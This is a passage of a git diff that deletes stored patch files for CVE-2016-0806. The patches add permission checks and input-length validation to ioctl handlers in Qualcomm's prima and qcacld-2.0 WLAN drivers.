-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+		FL("permission check failed"));
-+      return -EPERM;
-+    }
-+
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0005.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0005.patch
deleted file mode 100644
index 9dcb2242..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0005.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 518fd80981eefa9715e0851260b2c7aeb86551d7 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 10:34:06 -0700
-Subject: wlan:Check priviledge permission
-
-for QCSAP_IOCTL_SETWPSIE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_SETWPSIE IOCTL,
-making sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I66acff95d6151b32f1cb3c36a164e1de021e1e30
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-index 45c6f78..7598b99 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -2147,6 +2147,13 @@ static int iw_softap_setwpsie(struct net_device *dev,
-    u_int16_t length;   
-    ENTER();
- 
-+   if (!capable(CAP_NET_ADMIN))
-+   {
-+     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+	       FL("permission check failed"));
-+     return -EPERM;
-+   }
-+
-    if(!wrqu->data.length)
-       return 0;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0006.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0006.patch
deleted file mode 100644
index 711c3224..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0006.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 86fd66a451b2549f990b71013220e0a3f46b5a00 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 10:41:41 -0700
-Subject: wlan:Check priviledge permission
-
-for QCSAP_IOCTL_DISASSOC_STA
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_DISASSOC_STA IOCTL,
-making sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I7928789c0ce94a2b81495064496766b9e62d6ed8
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-index 7598b99..005c193 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -1338,7 +1338,14 @@ static iw_softap_disassoc_sta(struct net_device *dev,
- {
-     hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
-     v_U8_t *peerMacAddr;    
--    
-+   
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+		FL("permission check failed"));
-+      return -EPERM;
-+    }
-+
-     ENTER();
-     /* iwpriv tool or framework calls this ioctl with
-      * data passed in extra (less than 16 octets);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0007.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0007.patch
deleted file mode 100644
index 168843a4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0007.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 4a75c965d2505ca2490a365a27309cc9dd68b2d1 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula <c_hpothu@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 10:54:37 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_THREE_INT_GET_NONE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_THREE_INT_GET_NONE IOCTL,
-making sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I8661872786adfb5492da505ba3960e62064ddd7e
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 9b41a5e..1288bd0 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -4049,6 +4049,13 @@ int iw_set_three_ints_getnone(struct net_device *dev, struct iw_request_info *in
-     int sub_cmd = value[0];
-     int ret = 0;
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+		FL("permission check failed"));
-+      return -EPERM;
-+    }
-+
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-         VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0008.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0008.patch
deleted file mode 100644
index a1c03826..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0008.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From ede034fd604a9cdb20eb7accdaec4a8e70ffac41 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 16:55:17 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_BAND_CONFIG IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_BAND_CONFIG IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I34e9d91f778b09eb73881aed5c6e3a10cbbd208c
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 1288bd0..7add243 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6499,6 +6499,13 @@ static int iw_set_band_config(struct net_device *dev,
-     tANI_U8 *ptr = (tANI_U8*)wrqu->data.pointer;
-     int ret = 0;
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+		FL("permission check failed"));
-+      return -EPERM;
-+    }
-+
-     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__);
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0009.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0009.patch
deleted file mode 100644
index ad265a8a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0009.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From aaf7476fa7fdc8d1865f20217c7c57ce561e03f7 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 17:00:41 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_POWER_PARAMS IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_POWER_PARAMS IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: Iaab3d55c2acc75f65d6daf5998713cc9ff92a32c
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 7add243..85d881a 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6529,6 +6529,13 @@ static int iw_set_power_params_priv(struct net_device *dev,
-                            struct iw_request_info *info,
-                            union iwreq_data *wrqu, char *extra)
- {
-+  if (!capable(CAP_NET_ADMIN))
-+  {
-+    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+	      FL("permission check failed"));
-+    return -EPERM;
-+  }
-+
-   VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-                 "Set power params Private");
-   return iw_set_power_params(dev,info,wrqu,extra,0);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0010.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0010.patch
deleted file mode 100644
index 8a69b78c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0010.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 973503f0d411e13e01fa10c5ea802dcb8a12cf85 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 17:03:19 -0700
-Subject: wlan:Check priviledge permission
-
-for CLEAR_MCBC_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing CLEAR_MCBC_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I2332845fa6793dc63b6f397a9ebf53d37a52a7c7
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 85d881a..558fc1b 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -5306,6 +5306,13 @@ static int iw_clear_dynamic_mcbc_filter(struct net_device *dev,
-     tpSirWlanSetRxpFilters wlanRxpFilterParam;
-     hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "%s: ", __func__);
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+		FL("permission check failed"));
-+      return -EPERM;
-+    }
-+
-     //Reset the filter to INI value as we have to clear the dynamic filter
-     pHddCtx->configuredMcastBcastFilter = pHddCtx->cfg_ini->mcastBcastFilterSetting;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0011.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0011.patch
deleted file mode 100644
index 4813af33..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0011.patch
+++ /dev/null
@@ -1,117 +0,0 @@
-From 34953f9f66d9cd36616c5271a7d285b31d9142c2 Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar <c_msapta@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 17:15:02 -0700
-Subject: qcacld 2.0: Validate WPA and RSN IE for valid length
-
-prima to qcacld-2.0 propagation
-
-Return failure to applications if genie ioctl is invoked to configure
-WPS/WPA/RSN IEs with arguments of improper length.
-
-Bug: 27104184
-Change-Id: I31e288db41e14b24be0e430afed3a5e360da1370
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 39 +++++++++++++++++-----
- 1 file changed, 31 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 558fc1b..095aa9d 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -1531,9 +1531,10 @@ static int iw_set_genie(struct net_device *dev,
-         char *extra)
- {
-    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
--    u_int8_t *genie;
--    v_U16_t remLen;
-+   hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-+   u_int8_t *genie;
-+   v_U16_t remLen;
-+   int ret = 0;
- 
-    ENTER();
-    if(!wrqu->data.length) {
-@@ -1570,7 +1571,10 @@ static int iw_set_genie(struct net_device *dev,
-          {
-             case IE_EID_VENDOR:
-                 if ((IE_LEN_SIZE+IE_EID_SIZE+IE_VENDOR_OUI_SIZE) > eLen) /* should have at least OUI */
--                return -EINVAL;
-+		  {
-+		    ret = -EINVAL;
-+		    goto exit;
-+		  }
- 
-                 if (0 == memcmp(&genie[0], "\x00\x50\xf2\x04", 4))
-                 {
-@@ -1583,7 +1587,8 @@ static int iw_set_genie(struct net_device *dev,
-                        hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-                                                       "Need bigger buffer space\n");
-                        VOS_ASSERT(0);
--                       return -ENOMEM;
-+		       ret = -EINVAL;
-+		       goto exit;
-                     }
-                     // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
-                     memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -1592,6 +1597,14 @@ static int iw_set_genie(struct net_device *dev,
-                 else if (0 == memcmp(&genie[0], "\x00\x50\xf2", 3))
-                 {
-                     hddLog (VOS_TRACE_LEVEL_INFO, "%s Set WPA IE (len %d)",__func__, eLen + 2);
-+                    if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+		      {
-+			hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+			       "Need bigger buffer space");
-+			ret = -EINVAL;
-+			VOS_ASSERT(0);
-+			goto exit;
-+		      }
-                     memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
-                     memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
-                     pWextState->roamProfile.pWPAReqIE = pWextState->WPARSNIE;
-@@ -1608,7 +1621,8 @@ static int iw_set_genie(struct net_device *dev,
-                        hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-                                                       "Need bigger buffer space\n");
-                        VOS_ASSERT(0);
--                       return -ENOMEM;
-+                       ret = -ENOMEM;
-+                       goto exit;
-                     }
-                     // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
-                     memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -1617,6 +1631,14 @@ static int iw_set_genie(struct net_device *dev,
-               break;
-          case DOT11F_EID_RSN:
-                 hddLog (LOG1, "%s Set RSN IE (len %d)",__func__, eLen+2);
-+                if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+		  {
-+                    hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+			   "Need bigger buffer space");
-+                    ret = -EINVAL;
-+                    VOS_ASSERT(0);
-+                    goto exit;
-+		  }
-                 memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
-                 memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
-                 pWextState->roamProfile.pRSNReqIE = pWextState->WPARSNIE;
-@@ -1625,13 +1647,14 @@ static int iw_set_genie(struct net_device *dev,
- 
-          default:
-                 hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId);
--            return 0;
-+		goto exit;
-     }
-         genie += eLen;
-         remLen -= eLen;
-     }
-+ exit:
-     EXIT();
--    return 0;
-+    return ret;
- }
- 
- static int iw_get_genie(struct net_device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0012.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0012.patch
deleted file mode 100644
index cf20c78b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0012.patch
+++ /dev/null
@@ -1,189 +0,0 @@
-From 72d3908cc1bcb075015f1b86001f4292ac41d38a Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar <c_msapta@qti.qualcomm.com>
-Date: Wed, 13 Apr 2016 09:19:31 -0700
-Subject: qcacld 2.0: Validate ioctls for valid input length prima to
- qcacld-2.0 propagation
-
-Return failure to applications if ioctl is invoked with arguments
-of improper length.
-
-Bug: 27104184
-Change-Id: I4459c5f39ca9c7a852772913578bd2122cb73879
----
- .../staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c  | 60 ++++++++++++++++++----
- 1 file changed, 49 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-index 005c193..9441a2a 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -2151,7 +2151,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-    u_int8_t *pos;
-    tpSap_WPSIE pSap_WPSIe;
-    u_int8_t WPSIeType;
--   u_int16_t length;   
-+   u_int16_t length;  
-+   int ret = 0;
-    ENTER();
- 
-    if (!capable(CAP_NET_ADMIN))
-@@ -2183,8 +2184,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA: 
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe); 
--               return -EINVAL;
-+	       ret = -EINVAL;
-+	       goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
-             {
-@@ -2242,6 +2243,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2; 
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+		      if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
-+		      {
-+			ret = -EINVAL;
-+			goto exit;
-+		      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT; 
-                       pos += length;
-@@ -2256,8 +2262,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                    
-                    default:
-                       hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)\n", (*pos<<8 | *(pos+1)));
--                      vos_mem_free(pSap_WPSIe);
--                      return -EINVAL; 
-+		      ret = -EINVAL;
-+		      goto exit;
-                 }
-               }  
-             }
-@@ -2269,8 +2275,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                  
-          default:
-             hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
--            vos_mem_free(pSap_WPSIe);
--            return 0;
-+	    ret = -EINVAL;
-+	    goto exit;
-       }
-     } 
-     else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE)
-@@ -2282,8 +2288,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA: 
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe); 
--               return -EINVAL;
-+	       ret = -EINVAL;
-+	       goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
-             {
-@@ -2347,6 +2353,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2; 
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+		      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
-+		      {
-+			ret = -EINVAL;
-+			goto exit;
-+		      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
-                       pos += length;
-@@ -2356,6 +2367,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+		      if (length >  (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
-+		      {
-+			ret = -EINVAL;
-+			goto exit;
-+		      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
-@@ -2366,6 +2382,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+		      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
-+		      {
-+			ret = -EINVAL;
-+			goto exit;
-+		      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
-@@ -2375,6 +2396,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+		      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text)))
-+		      {
-+			ret = -EINVAL;
-+			goto exit;
-+		      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
-@@ -2384,6 +2410,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+		      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
-+		      {
-+			ret = -EINVAL;
-+			goto exit;
-+		      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
-@@ -2394,7 +2425,6 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory = (*pos<<8 | *(pos+1));
-                       hddLog(LOG1, "primary dev category: %d\n", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory);  
-                       pos += 2;
--                      
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceOUI, pos, HDD_WPS_DEVICE_OUI_LEN);
-                       hddLog(LOG1, "primary dev oui: %02x, %02x, %02x, %02x\n", pos[0], pos[1], pos[2], pos[3]);
-                       pos += 4;
-@@ -2407,6 +2437,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+		      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
-+		      {
-+			ret = -EINVAL;
-+			goto exit;
-+		      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
-                       pos += length;
-@@ -2438,6 +2473,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-       } // switch
-     }
-     halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
-+    if (halStatus != eHAL_STATUS_SUCCESS)
-+      ret = -EINVAL;
-     pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
-     if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
-     {
-@@ -2446,9 +2483,10 @@ static int iw_softap_setwpsie(struct net_device *dev,
-         WLANSAP_Update_WpsIe ( pVosContext );
-     }
-  
-+ exit:
-     vos_mem_free(pSap_WPSIe);   
-     EXIT();
--    return halStatus;
-+    return ret;
- }
- 
- static int iw_softap_stopbss(struct net_device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0013.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0013.patch
deleted file mode 100644
index b255b265..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0013.patch
+++ /dev/null
@@ -1,120 +0,0 @@
-From 055561f40f2baa5cdd74f952be55b61a3907279a Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 16:56:58 -0700
-Subject: qcacld 2.0: Validate WPA and RSN IE for valid length
-
-prima to qcacld-2.0 propagation
-
-Return failure to applications if genie ioctl is invoked to configure
-WPS/WPA/RSN IEs with arguments of improper length.
-
-CRs-Fixed: 931451
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- .../qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c        | 37 ++++++++++++++++------
- 1 file changed, 27 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 38a13fa..93136df 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -2270,11 +2270,12 @@ static int iw_set_genie(struct net_device *dev,
-         union iwreq_data *wrqu,
-         char *extra)
- {
--   hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-+    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-     hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-     u_int8_t *genie = NULL;
-     u_int8_t *base_genie = NULL;
-     v_U16_t remLen;
-+    int ret = 0;
- 
-    ENTER();
- 
-@@ -2324,8 +2325,8 @@ static int iw_set_genie(struct net_device *dev,
-             case IE_EID_VENDOR:
-                 if ((IE_LEN_SIZE+IE_EID_SIZE+IE_VENDOR_OUI_SIZE) > eLen) /* should have at least OUI */
-                 {
--                    kfree(base_genie);
--                    return -EINVAL;
-+                    ret = -EINVAL;
-+                    goto exit;
-                 }
- 
-                 if (0 == memcmp(&genie[0], "\x00\x50\xf2\x04", 4))
-@@ -2339,8 +2340,8 @@ static int iw_set_genie(struct net_device *dev,
-                        hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-                                                       "Need bigger buffer space");
